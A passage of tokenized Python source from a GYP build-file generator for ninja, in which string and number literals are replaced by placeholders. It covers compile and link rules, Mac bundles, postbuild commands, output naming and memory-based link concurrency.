cflags_objcc ) ) <EOL> ninja_file . newline ( ) <EOL> outputs = [ ] <EOL> has_rc_source = False <EOL> for source in sources : <EOL> filename , ext = os . path . splitext ( source ) <EOL> ext = ext [ <NUM_LIT:1> : ] <EOL> obj_ext = self . obj_ext <EOL> if ext in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> command = '<STR_LIT>' <EOL> self . uses_cpp = True <EOL> elif ext == '<STR_LIT:c>' or ( ext == '<STR_LIT:S>' and self . flavor != '<STR_LIT>' ) : <EOL> command = '<STR_LIT>' <EOL> elif ext == '<STR_LIT:s>' and self . flavor != '<STR_LIT>' : <EOL> command = '<STR_LIT>' <EOL> elif ( self . flavor == '<STR_LIT>' and ext == '<STR_LIT>' and <EOL> self . msvs_settings . GetArch ( config_name ) == '<STR_LIT>' and <EOL> not self . msvs_settings . HasExplicitAsmRules ( spec ) ) : <EOL> command = '<STR_LIT>' <EOL> obj_ext = '<STR_LIT>' <EOL> elif self . flavor == '<STR_LIT>' and ext == '<STR_LIT:m>' : <EOL> command = '<STR_LIT>' <EOL> elif self . flavor == '<STR_LIT>' and ext == '<STR_LIT>' : <EOL> command = '<STR_LIT>' <EOL> self . uses_cpp = True <EOL> elif self . flavor == '<STR_LIT>' and ext == '<STR_LIT>' : <EOL> command = '<STR_LIT>' <EOL> obj_ext = '<STR_LIT>' <EOL> has_rc_source = True <EOL> else : <EOL> continue <EOL> input = self . GypPathToNinja ( source ) <EOL> output = self . GypPathToUniqueOutput ( filename + obj_ext ) <EOL> if arch is not None : <EOL> output = AddArch ( output , arch ) <EOL> implicit = precompiled_header . GetObjDependencies ( [ input ] , [ output ] , arch ) <EOL> variables = [ ] <EOL> if self . flavor == '<STR_LIT>' : <EOL> variables , output , implicit = precompiled_header . GetFlagsModifications ( <EOL> input , output , implicit , command , cflags_c , cflags_cc , <EOL> self . ExpandSpecial ) <EOL> ninja_file . build ( output , command , input , <EOL> implicit = [ gch for _ , _ , gch in implicit ] , <EOL> order_only = predepends , variables = variables ) <EOL> outputs . append ( output ) <EOL> if has_rc_source : <EOL> resource_include_dirs = config . get ( '<STR_LIT>' , include_dirs ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> [ QuoteShellArgument ( '<STR_LIT>' + self . GypPathToNinja ( i , env ) , self . flavor ) <EOL> for i in resource_include_dirs ] ) <EOL> self . WritePchTargets ( ninja_file , pch_commands ) <EOL> ninja_file . newline ( ) <EOL> return outputs <EOL> def WritePchTargets ( self , ninja_file , pch_commands ) : <EOL> """<STR_LIT>""" <EOL> if not pch_commands : <EOL> return <EOL> for gch , lang_flag , lang , input in pch_commands : <EOL> var_name = { <EOL> '<STR_LIT:c>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:m>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } [ lang ] <EOL> map = { '<STR_LIT:c>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:m>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , } <EOL> cmd = map . get ( lang ) <EOL> ninja_file . build ( gch , cmd , input , variables = [ ( var_name , lang_flag ) ] ) <EOL> def WriteLink ( self , spec , config_name , config , link_deps ) : <EOL> """<STR_LIT>""" <EOL> if self . flavor != '<STR_LIT>' or len ( self . archs ) == <NUM_LIT:1> : <EOL> return self . WriteLinkForArch ( <EOL> self . ninja , spec , config_name , config , link_deps ) <EOL> else : <EOL> output = self . ComputeOutput ( spec ) <EOL> inputs = [ self . WriteLinkForArch ( self . arch_subninjas [ arch ] , spec , <EOL> config_name , config , link_deps [ arch ] , <EOL> arch = arch ) <EOL> for arch in self . archs ] <EOL> extra_bindings = [ ] <EOL> build_output = output <EOL> if not self . is_mac_bundle : <EOL> self . AppendPostbuildVariable ( extra_bindings , spec , output , output ) <EOL> if ( spec [ '<STR_LIT:type>' ] in ( '<STR_LIT>' , '<STR_LIT>' ) and <EOL> not self . is_mac_bundle ) : <EOL> extra_bindings . append ( ( '<STR_LIT>' , output ) ) <EOL> self . ninja . build ( [ output , output + '<STR_LIT>' ] , '<STR_LIT>' , inputs , <EOL> variables = extra_bindings ) <EOL> else : <EOL> self . ninja . build ( build_output , '<STR_LIT>' , inputs , variables = extra_bindings ) <EOL> return output <EOL> def WriteLinkForArch ( self , ninja_file , spec , config_name , config , <EOL> link_deps , arch = None ) : <EOL> """<STR_LIT>""" <EOL> command = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } [ spec [ '<STR_LIT:type>' ] ] <EOL> command_suffix = '<STR_LIT>' <EOL> implicit_deps = set ( ) <EOL> solibs = set ( ) <EOL> if '<STR_LIT>' in spec : <EOL> extra_link_deps = set ( ) <EOL> for dep in spec [ '<STR_LIT>' ] : <EOL> target = self . target_outputs . get ( dep ) <EOL> if not target : <EOL> continue <EOL> linkable = target . Linkable ( ) <EOL> if linkable : <EOL> new_deps = [ ] <EOL> if ( self . flavor == '<STR_LIT>' and <EOL> target . component_objs and <EOL> self . msvs_settings . IsUseLibraryDependencyInputs ( config_name ) ) : <EOL> new_deps = target . component_objs <EOL> elif self . flavor == '<STR_LIT>' and target . import_lib : <EOL> new_deps = [ target . import_lib ] <EOL> elif target . UsesToc ( self . flavor ) : <EOL> solibs . add ( target . binary ) <EOL> implicit_deps . add ( target . binary + '<STR_LIT>' ) <EOL> else : <EOL> new_deps = [ target . binary ] <EOL> for new_dep in new_deps : <EOL> if new_dep not in extra_link_deps : <EOL> extra_link_deps . add ( new_dep ) <EOL> link_deps . append ( new_dep ) <EOL> final_output = target . FinalOutput ( ) <EOL> if not linkable or final_output != target . binary : <EOL> implicit_deps . add ( final_output ) <EOL> extra_bindings = [ ] <EOL> if self . uses_cpp and self . flavor != '<STR_LIT>' : <EOL> extra_bindings . append ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> output = self . ComputeOutput ( spec , arch ) <EOL> if arch is None and not self . is_mac_bundle : <EOL> self . AppendPostbuildVariable ( extra_bindings , spec , output , output ) <EOL> is_executable = spec [ '<STR_LIT:type>' ] == '<STR_LIT>' <EOL> env_ldflags = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> ldflags = self . xcode_settings . GetLdflags ( config_name , <EOL> self . ExpandSpecial ( generator_default_variables [ '<STR_LIT>' ] ) , <EOL> self . GypPathToNinja , arch ) <EOL> ldflags = env_ldflags + ldflags <EOL> elif self . flavor == '<STR_LIT>' : <EOL> manifest_base_name = self . GypPathToUniqueOutput ( <EOL> self . ComputeOutputFileName ( spec ) ) <EOL> ldflags , intermediate_manifest , manifest_files = self . msvs_settings . GetLdflags ( config_name , self . GypPathToNinja , <EOL> self . ExpandSpecial , manifest_base_name , <EOL> output , is_executable , <EOL> self . toplevel_build ) <EOL> ldflags = env_ldflags + ldflags <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , manifest_files ) <EOL> implicit_deps = implicit_deps . union ( manifest_files ) <EOL> if intermediate_manifest : <EOL> self . WriteVariableList ( <EOL> ninja_file , '<STR_LIT>' , [ intermediate_manifest ] ) <EOL> command_suffix = _GetWinLinkRuleNameSuffix ( <EOL> self . msvs_settings . IsEmbedManifest ( config_name ) ) <EOL> def_file = self . msvs_settings . GetDefFile ( self . GypPathToNinja ) <EOL> if def_file : <EOL> implicit_deps . add ( def_file ) <EOL> else : <EOL> ldflags = env_ldflags + config . get ( '<STR_LIT>' , [ ] ) <EOL> if is_executable and len ( solibs ) : <EOL> rpath = '<STR_LIT>' <EOL> if self . toolset != '<STR_LIT:target>' : <EOL> rpath += self . toolset <EOL> ldflags . append ( r'<STR_LIT>' % rpath ) <EOL> ldflags . append ( '<STR_LIT>' % rpath ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> gyp . common . uniquer ( map ( self . ExpandSpecial , ldflags ) ) ) <EOL> library_dirs = config . get ( '<STR_LIT>' , [ ] ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> library_dirs = [ self . msvs_settings . ConvertVSMacros ( l , config_name ) <EOL> for l in library_dirs ] <EOL> library_dirs = [ '<STR_LIT>' + QuoteShellArgument ( self . GypPathToNinja ( l ) , <EOL> self . flavor ) <EOL> for l in library_dirs ] <EOL> else : <EOL> library_dirs = [ QuoteShellArgument ( '<STR_LIT>' + self . GypPathToNinja ( l ) , <EOL> self . flavor ) <EOL> for l in library_dirs ] <EOL> libraries = gyp . common . uniquer ( map ( self . ExpandSpecial , <EOL> spec . get ( '<STR_LIT>' , [ ] ) ) ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> libraries = self . xcode_settings . AdjustLibraries ( libraries , config_name ) <EOL> elif self . flavor == '<STR_LIT>' : <EOL> libraries = self . msvs_settings . AdjustLibraries ( libraries ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , library_dirs + libraries ) <EOL> linked_binary = output <EOL> if command in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> extra_bindings . append ( ( '<STR_LIT>' , os . path . split ( output ) [ <NUM_LIT:1> ] ) ) <EOL> extra_bindings . append ( ( '<STR_LIT>' , <EOL> gyp . common . EncodePOSIXShellArgument ( output ) ) ) <EOL> if self . flavor != '<STR_LIT>' : <EOL> link_file_list = output <EOL> if self . is_mac_bundle : <EOL> link_file_list = self . xcode_settings . GetWrapperName ( ) <EOL> if arch : <EOL> link_file_list += '<STR_LIT:.>' + arch <EOL> link_file_list += '<STR_LIT>' <EOL> link_file_list = link_file_list . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) <EOL> extra_bindings . append ( <EOL> ( '<STR_LIT>' , <EOL> gyp . common . EncodePOSIXShellArgument ( link_file_list ) ) ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> extra_bindings . append ( ( '<STR_LIT>' , output ) ) <EOL> if '<STR_LIT>' not in ldflags : <EOL> self . target . import_lib = output + '<STR_LIT>' <EOL> extra_bindings . append ( ( '<STR_LIT>' , <EOL> '<STR_LIT>' % self . target . import_lib ) ) <EOL> pdbname = self . msvs_settings . GetPDBName ( <EOL> config_name , self . ExpandSpecial , output + '<STR_LIT>' ) <EOL> output = [ output , self . target . import_lib ] <EOL> if pdbname : <EOL> output . append ( pdbname ) <EOL> elif not self . is_mac_bundle : <EOL> output = [ output , output + '<STR_LIT>' ] <EOL> else : <EOL> command = command + '<STR_LIT>' <EOL> elif self . flavor == '<STR_LIT>' : <EOL> extra_bindings . append ( ( '<STR_LIT>' , output ) ) <EOL> pdbname = self . msvs_settings . GetPDBName ( <EOL> config_name , self . ExpandSpecial , output + '<STR_LIT>' ) <EOL> if pdbname : <EOL> output = [ output , pdbname ] <EOL> if len ( solibs ) : <EOL> extra_bindings . append ( ( '<STR_LIT>' , gyp . common . EncodePOSIXShellList ( solibs ) ) ) <EOL> ninja_file . build ( output , command + command_suffix , link_deps , <EOL> implicit = list ( implicit_deps ) , <EOL> variables = extra_bindings ) <EOL> return linked_binary <EOL> def WriteTarget ( self , spec , config_name , config , link_deps , compile_deps ) : <EOL> extra_link_deps = any ( self . target_outputs . get ( dep ) . Linkable ( ) <EOL> for dep in spec . get ( '<STR_LIT>' , [ ] ) <EOL> if dep in self . target_outputs ) <EOL> if spec [ '<STR_LIT:type>' ] == '<STR_LIT:none>' or ( not link_deps and not extra_link_deps ) : <EOL> self . target . binary = compile_deps <EOL> self . target . type = '<STR_LIT:none>' <EOL> elif spec [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> self . target . binary = self . ComputeOutput ( spec ) <EOL> if ( self . flavor not in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) and not <EOL> self . is_standalone_static_library ) : <EOL> self . ninja . build ( self . target . binary , '<STR_LIT>' , link_deps , <EOL> order_only = compile_deps ) <EOL> else : <EOL> variables = [ ] <EOL> if self . xcode_settings : <EOL> libtool_flags = self . xcode_settings . GetLibtoolflags ( config_name ) <EOL> if libtool_flags : <EOL> variables . append ( ( '<STR_LIT>' , libtool_flags ) ) <EOL> if self . msvs_settings : <EOL> libflags = self . msvs_settings . GetLibFlags ( config_name , <EOL> self . GypPathToNinja ) <EOL> variables . append ( ( '<STR_LIT>' , libflags ) ) <EOL> if self . flavor != '<STR_LIT>' or len ( self . archs ) == <NUM_LIT:1> : <EOL> self . AppendPostbuildVariable ( variables , spec , <EOL> self . target . binary , self . target . binary ) <EOL> self . ninja . build ( self . target . binary , '<STR_LIT>' , link_deps , <EOL> order_only = compile_deps , variables = variables ) <EOL> else : <EOL> inputs = [ ] <EOL> for arch in self . archs : <EOL> output = self . ComputeOutput ( spec , arch ) <EOL> self . arch_subninjas [ arch ] . build ( output , '<STR_LIT>' , link_deps [ arch ] , <EOL> order_only = compile_deps , <EOL> variables = variables ) <EOL> inputs . append ( output ) <EOL> self . AppendPostbuildVariable ( variables , spec , <EOL> self . target . binary , self . target . binary ) <EOL> self . ninja . build ( self . target . binary , '<STR_LIT>' , inputs , <EOL> variables = variables ) <EOL> else : <EOL> self . target . binary = self . WriteLink ( spec , config_name , config , link_deps ) <EOL> return self . target . binary <EOL> def WriteMacBundle ( self , spec , mac_bundle_depends , is_empty ) : <EOL> assert self . is_mac_bundle <EOL> package_framework = spec [ '<STR_LIT:type>' ] in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> output = self . ComputeMacBundleOutput ( ) <EOL> if is_empty : <EOL> output += '<STR_LIT>' <EOL> variables = [ ] <EOL> self . AppendPostbuildVariable ( variables , spec , output , self . target . binary , <EOL> is_command_start = not package_framework ) <EOL> if package_framework and not is_empty : <EOL> variables . append ( ( '<STR_LIT:version>' , self . xcode_settings . GetFrameworkVersion ( ) ) ) <EOL> self . ninja . build ( output , '<STR_LIT>' , mac_bundle_depends , <EOL> variables = variables ) <EOL> else : <EOL> self . ninja . build ( output , '<STR_LIT>' , mac_bundle_depends , <EOL> variables = variables ) <EOL> self . target . bundle = output <EOL> return output <EOL> def GetToolchainEnv ( self , additional_settings = None ) : <EOL> """<STR_LIT>""" <EOL> env = self . GetSortedXcodeEnv ( additional_settings = additional_settings ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> env = self . GetMsvsToolchainEnv ( <EOL> additional_settings = additional_settings ) <EOL> return env <EOL> def GetMsvsToolchainEnv ( self , additional_settings = None ) : <EOL> """<STR_LIT>""" <EOL> return self . msvs_settings . GetVSMacroEnv ( '<STR_LIT>' , <EOL> config = self . config_name ) <EOL> def GetSortedXcodeEnv ( self , additional_settings = None ) : <EOL> """<STR_LIT>""" <EOL> assert self . abs_build_dir <EOL> abs_build_dir = self . abs_build_dir <EOL> return gyp . xcode_emulation . GetSortedXcodeEnv ( <EOL> self . xcode_settings , abs_build_dir , <EOL> os . path . join ( abs_build_dir , self . build_to_base ) , self . config_name , <EOL> additional_settings ) <EOL> def GetSortedXcodePostbuildEnv ( self ) : <EOL> """<STR_LIT>""" <EOL> postbuild_settings = { } <EOL> strip_save_file = self . xcode_settings . GetPerTargetSetting ( <EOL> '<STR_LIT>' ) <EOL> if strip_save_file : <EOL> postbuild_settings [ '<STR_LIT>' ] = strip_save_file <EOL> return self . GetSortedXcodeEnv ( additional_settings = postbuild_settings ) <EOL> def AppendPostbuildVariable ( self , variables , spec , output , binary , <EOL> is_command_start = False ) : <EOL> """<STR_LIT>""" <EOL> postbuild = self . GetPostbuildCommand ( spec , output , binary , is_command_start ) <EOL> if postbuild : <EOL> variables . append ( ( '<STR_LIT>' , postbuild ) ) <EOL> def GetPostbuildCommand ( self , spec , output , output_binary , is_command_start ) : <EOL> """<STR_LIT>""" <EOL> if not self . xcode_settings or spec [ '<STR_LIT:type>' ] == '<STR_LIT:none>' or not output : <EOL> return '<STR_LIT>' <EOL> output = QuoteShellArgument ( output , self . flavor ) <EOL> postbuilds = gyp . xcode_emulation . GetSpecPostbuildCommands ( spec , quiet = True ) <EOL> if output_binary is not None : <EOL> postbuilds = self . xcode_settings . AddImplicitPostbuilds ( <EOL> self . config_name , <EOL> os . path . normpath ( os . path . join ( self . base_to_build , output ) ) , <EOL> QuoteShellArgument ( <EOL> os . path . normpath ( os . path . join ( self . base_to_build , output_binary ) ) , <EOL> self . flavor ) , <EOL> postbuilds , quiet = True ) <EOL> if not postbuilds : <EOL> return '<STR_LIT>' <EOL> postbuilds . insert ( <NUM_LIT:0> , gyp . common . EncodePOSIXShellList ( <EOL> [ '<STR_LIT>' , self . build_to_base ] ) ) <EOL> env = self . ComputeExportEnvString ( self . GetSortedXcodePostbuildEnv ( ) ) <EOL> commands = env + '<STR_LIT>' + '<STR_LIT>' . join ( [ ninja_syntax . escape ( command ) for command in postbuilds ] ) <EOL> command_string = ( commands + '<STR_LIT>' <EOL> '<STR_LIT>' % output + '<STR_LIT>' ) <EOL> if is_command_start : <EOL> return '<STR_LIT:(>' + command_string + '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' + command_string <EOL> def ComputeExportEnvString ( self , env ) : <EOL> """<STR_LIT>""" <EOL> export_str = [ ] <EOL> for k , v in env : <EOL> export_str . append ( '<STR_LIT>' % <EOL> ( k , ninja_syntax . escape ( gyp . common . EncodePOSIXShellArgument ( v ) ) ) ) <EOL> return '<STR_LIT:U+0020>' . join ( export_str ) <EOL> def ComputeMacBundleOutput ( self ) : <EOL> """<STR_LIT>""" <EOL> assert self . is_mac_bundle <EOL> path = generator_default_variables [ '<STR_LIT>' ] <EOL> return self . ExpandSpecial ( <EOL> os . path . join ( path , self . xcode_settings . GetWrapperName ( ) ) ) <EOL> def ComputeOutputFileName ( self , spec , type = None ) : <EOL> """<STR_LIT>""" <EOL> if not type : <EOL> type = spec [ '<STR_LIT:type>' ] <EOL> default_variables = copy . copy ( generator_default_variables ) <EOL> CalculateVariables ( default_variables , { '<STR_LIT>' : self . flavor } ) <EOL> DEFAULT_PREFIX = { <EOL> '<STR_LIT>' : default_variables [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : default_variables [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : default_variables [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : default_variables [ '<STR_LIT>' ] , <EOL> } <EOL> prefix = spec . get ( '<STR_LIT>' , DEFAULT_PREFIX . get ( type , '<STR_LIT>' ) ) <EOL> DEFAULT_EXTENSION = { <EOL> '<STR_LIT>' : default_variables [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : default_variables [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : default_variables [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : default_variables [ '<STR_LIT>' ] , <EOL> } <EOL> extension = spec . get ( '<STR_LIT>' ) <EOL> if extension : <EOL> extension = '<STR_LIT:.>' + extension <EOL> else : <EOL> extension = DEFAULT_EXTENSION . get ( type , '<STR_LIT>' ) <EOL> if '<STR_LIT>' in spec : <EOL> target = spec [ '<STR_LIT>' ] <EOL> else : <EOL> target = spec [ '<STR_LIT>' ] <EOL> if prefix == '<STR_LIT>' : <EOL> target = StripPrefix ( target , '<STR_LIT>' ) <EOL> if type in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> return '<STR_LIT>' % ( prefix , target , extension ) <EOL> elif type == '<STR_LIT:none>' : <EOL> return '<STR_LIT>' % target <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % type ) <EOL> def ComputeOutput ( self , spec , arch = None ) : <EOL> """<STR_LIT>""" <EOL> type = spec [ '<STR_LIT:type>' ] <EOL> if self . flavor == '<STR_LIT>' : <EOL> override = self . msvs_settings . GetOutputName ( self . config_name , <EOL> self . ExpandSpecial ) <EOL> if override : <EOL> return override <EOL> if arch is None and self . flavor == '<STR_LIT>' and type in ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> filename = self . xcode_settings . GetExecutablePath ( ) <EOL> else : <EOL> filename = self . ComputeOutputFileName ( spec , type ) <EOL> if arch is None and '<STR_LIT>' in spec : <EOL> path = os . path . join ( spec [ '<STR_LIT>' ] , filename ) <EOL> return self . ExpandSpecial ( path ) <EOL> type_in_output_root = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> if self . flavor == '<STR_LIT>' and self . toolset == '<STR_LIT:target>' : <EOL> type_in_output_root += [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> elif self . flavor == '<STR_LIT>' and self . toolset == '<STR_LIT:target>' : <EOL> type_in_output_root += [ '<STR_LIT>' ] <EOL> if arch is not None : <EOL> archdir = '<STR_LIT>' <EOL> if self . toolset != '<STR_LIT:target>' : <EOL> archdir = os . path . join ( '<STR_LIT>' , '<STR_LIT:%s>' % self . toolset ) <EOL> return os . path . join ( archdir , AddArch ( filename , arch ) ) <EOL> elif type in type_in_output_root or self . is_standalone_static_library : <EOL> return filename <EOL> elif type == '<STR_LIT>' : <EOL> libdir = '<STR_LIT>' <EOL> if self . toolset != '<STR_LIT:target>' : <EOL> libdir = os . path . join ( '<STR_LIT>' , '<STR_LIT:%s>' % self . toolset ) <EOL> return os . path . join ( libdir , filename ) <EOL> else : <EOL> return self . GypPathToUniqueOutput ( filename , qualified = False ) <EOL> def WriteVariableList ( self , ninja_file , var , values ) : <EOL> assert not isinstance ( values , str ) <EOL> if values is None : <EOL> values = [ ] <EOL> ninja_file . variable ( var , '<STR_LIT:U+0020>' . join ( values ) ) <EOL> def WriteNewNinjaRule ( self , name , args , description , is_cygwin , env , pool ) : <EOL> """<STR_LIT>""" <EOL> if self . flavor == '<STR_LIT>' : <EOL> args = [ self . msvs_settings . ConvertVSMacros ( <EOL> arg , self . base_to_build , config = self . config_name ) <EOL> for arg in args ] <EOL> description = self . msvs_settings . ConvertVSMacros ( <EOL> description , config = self . config_name ) <EOL> elif self . flavor == '<STR_LIT>' : <EOL> args = [ gyp . xcode_emulation . ExpandEnvVars ( arg , env ) for arg in args ] <EOL> description = gyp . xcode_emulation . ExpandEnvVars ( description , env ) <EOL> rule_name = self . name <EOL> if self . toolset == '<STR_LIT:target>' : <EOL> rule_name += '<STR_LIT:.>' + self . toolset <EOL> rule_name += '<STR_LIT:.>' + name <EOL> rule_name = re . sub ( '<STR_LIT>' , '<STR_LIT:_>' , rule_name ) <EOL> protect = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> protect = '<STR_LIT>' + '<STR_LIT:|>' . join ( map ( re . escape , protect ) ) + '<STR_LIT:)>' <EOL> description = re . sub ( protect + r'<STR_LIT>' , '<STR_LIT:_>' , description ) <EOL> rspfile = None <EOL> rspfile_content = None <EOL> args = [ self . ExpandSpecial ( arg , self . base_to_build ) for arg in args ] <EOL> if self . flavor == '<STR_LIT>' : <EOL> rspfile = rule_name + '<STR_LIT>' <EOL> run_in = '<STR_LIT>' if is_cygwin else '<STR_LIT:U+0020>' + self . build_to_base <EOL> if is_cygwin : <EOL> rspfile_content = self . msvs_settings . BuildCygwinBashCommandLine ( <EOL> args , self . build_to_base ) <EOL> else : <EOL> rspfile_content = gyp . msvs_emulation . EncodeRspFileList ( args ) <EOL> command = ( '<STR_LIT>' % sys . executable + <EOL> rspfile + run_in ) <EOL> else : <EOL> env = self . ComputeExportEnvString ( env ) <EOL> command = gyp . common . EncodePOSIXShellList ( args ) <EOL> command = '<STR_LIT>' % self . build_to_base + env + command <EOL> self . ninja . rule ( rule_name , command , description , restat = True , pool = pool , <EOL> rspfile = rspfile , rspfile_content = rspfile_content ) <EOL> self . ninja . newline ( ) <EOL> return rule_name , args <EOL> def CalculateVariables ( default_variables , params ) : <EOL> """<STR_LIT>""" <EOL> global generator_additional_non_configuration_keys <EOL> global generator_additional_path_sections <EOL> flavor = gyp . common . GetFlavor ( params ) <EOL> if flavor == '<STR_LIT>' : <EOL> default_variables . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> default_variables . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> default_variables . setdefault ( '<STR_LIT>' , <EOL> generator_default_variables [ '<STR_LIT>' ] ) <EOL> default_variables . setdefault ( '<STR_LIT>' , <EOL> generator_default_variables [ '<STR_LIT>' ] ) <EOL> import gyp . generator . xcode as xcode_generator <EOL> generator_additional_non_configuration_keys = getattr ( xcode_generator , <EOL> '<STR_LIT>' , [ ] ) <EOL> generator_additional_path_sections = getattr ( xcode_generator , <EOL> '<STR_LIT>' , [ ] ) <EOL> global generator_extra_sources_for_rules <EOL> generator_extra_sources_for_rules = getattr ( xcode_generator , <EOL> '<STR_LIT>' , [ ] ) <EOL> elif flavor == '<STR_LIT>' : <EOL> exts = gyp . MSVSUtil . TARGET_TYPE_EXT <EOL> default_variables . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> default_variables [ '<STR_LIT>' ] = '<STR_LIT:.>' + exts [ '<STR_LIT>' ] <EOL> default_variables [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> default_variables [ '<STR_LIT>' ] = '<STR_LIT:.>' + exts [ '<STR_LIT>' ] <EOL> default_variables [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> default_variables [ '<STR_LIT>' ] = '<STR_LIT:.>' + exts [ '<STR_LIT>' ] <EOL> import gyp . generator . msvs as msvs_generator <EOL> generator_additional_non_configuration_keys = getattr ( msvs_generator , <EOL> '<STR_LIT>' , [ ] ) <EOL> generator_additional_path_sections = getattr ( msvs_generator , <EOL> '<STR_LIT>' , [ ] ) <EOL> gyp . msvs_emulation . CalculateCommonVariables ( default_variables , params ) <EOL> else : <EOL> operating_system = flavor <EOL> if flavor == '<STR_LIT>' : <EOL> operating_system = '<STR_LIT>' <EOL> default_variables . setdefault ( '<STR_LIT>' , operating_system ) <EOL> default_variables . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> default_variables . setdefault ( '<STR_LIT>' , <EOL> os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> default_variables . setdefault ( '<STR_LIT>' , <EOL> os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def ComputeOutputDir ( params ) : <EOL> """<STR_LIT>""" <EOL> generator_dir = os . path . relpath ( params [ '<STR_LIT>' ] . generator_output or '<STR_LIT:.>' ) <EOL> output_dir = params . get ( '<STR_LIT>' , { } ) . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return os . path . normpath ( os . path . join ( generator_dir , output_dir ) ) <EOL> def CalculateGeneratorInputInfo ( params ) : <EOL> """<STR_LIT>""" <EOL> toplevel = params [ '<STR_LIT>' ] . toplevel_dir <EOL> qualified_out_dir = os . path . normpath ( os . path . join ( <EOL> toplevel , ComputeOutputDir ( params ) , '<STR_LIT>' ) ) <EOL> global generator_filelist_paths <EOL> generator_filelist_paths = { <EOL> '<STR_LIT>' : toplevel , <EOL> '<STR_LIT>' : qualified_out_dir , <EOL> } <EOL> def OpenOutput ( path , mode = '<STR_LIT:w>' ) : <EOL> """<STR_LIT>""" <EOL> gyp . common . EnsureDirExists ( path ) <EOL> return open ( path , mode ) <EOL> def CommandWithWrapper ( cmd , wrappers , prog ) : <EOL> wrapper = wrappers . get ( cmd , '<STR_LIT>' ) <EOL> if wrapper : <EOL> return wrapper + '<STR_LIT:U+0020>' + prog <EOL> return prog <EOL> def GetDefaultConcurrentLinks ( ) : <EOL> """<STR_LIT>""" <EOL> pool_size = int ( os . getenv ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> if pool_size : <EOL> return pool_size <EOL> if sys . platform in ( '<STR_LIT:win32>' , '<STR_LIT>' ) : <EOL> import ctypes <EOL> class MEMORYSTATUSEX ( ctypes . Structure ) : <EOL> _fields_ = [ <EOL> ( "<STR_LIT>" , ctypes . c_ulong ) , <EOL> ( "<STR_LIT>" , ctypes . c_ulong ) , <EOL> ( "<STR_LIT>" , ctypes . c_ulonglong ) , <EOL> ( "<STR_LIT>" , ctypes . c_ulonglong ) , <EOL> ( "<STR_LIT>" , ctypes . c_ulonglong ) , <EOL> ( "<STR_LIT>" , ctypes . c_ulonglong ) , <EOL> ( "<STR_LIT>" , ctypes . c_ulonglong ) , <EOL> ( "<STR_LIT>" , ctypes . c_ulonglong ) , <EOL> ( "<STR_LIT>" , ctypes . c_ulonglong ) , <EOL> ] <EOL> stat = MEMORYSTATUSEX ( ) <EOL> stat . dwLength = ctypes . sizeof ( stat ) <EOL> ctypes . windll . kernel32 . GlobalMemoryStatusEx ( ctypes . byref ( stat ) ) <EOL> mem_limit = max ( <NUM_LIT:1> , stat . ullTotalPhys / ( <NUM_LIT:4> * ( <NUM_LIT:2> ** <NUM_LIT:30> ) ) ) <EOL> hard_cap = max ( <NUM_LIT:1> , int ( os . getenv ( '<STR_LIT>' , <NUM_LIT:2> ** <NUM_LIT:32> ) ) ) <EOL> return min ( mem_limit , hard_cap ) <EOL> elif sys . platform . startswith ( '<STR_LIT>' ) : <EOL> if os . path . exists ( "<STR_LIT>" ) : <EOL> with open ( "<STR_LIT>" ) as meminfo : <EOL> memtotal_re = re . compile ( r'<STR_LIT>' ) <EOL> for line in meminfo : <EOL> match = memtotal_re . match ( line ) <EOL> if not match : <EOL> continue <EOL> return max ( <NUM_LIT:1> , int ( match . group ( <NUM_LIT:1> ) ) / ( <NUM_LIT:8> * ( <NUM_LIT:2> ** <NUM_LIT:20> ) ) ) <EOL> return <NUM_LIT:1> <EOL> elif sys . platform == '<STR_LIT>' : <EOL> try : <EOL> avail_bytes = int ( subprocess . check_output ( [ 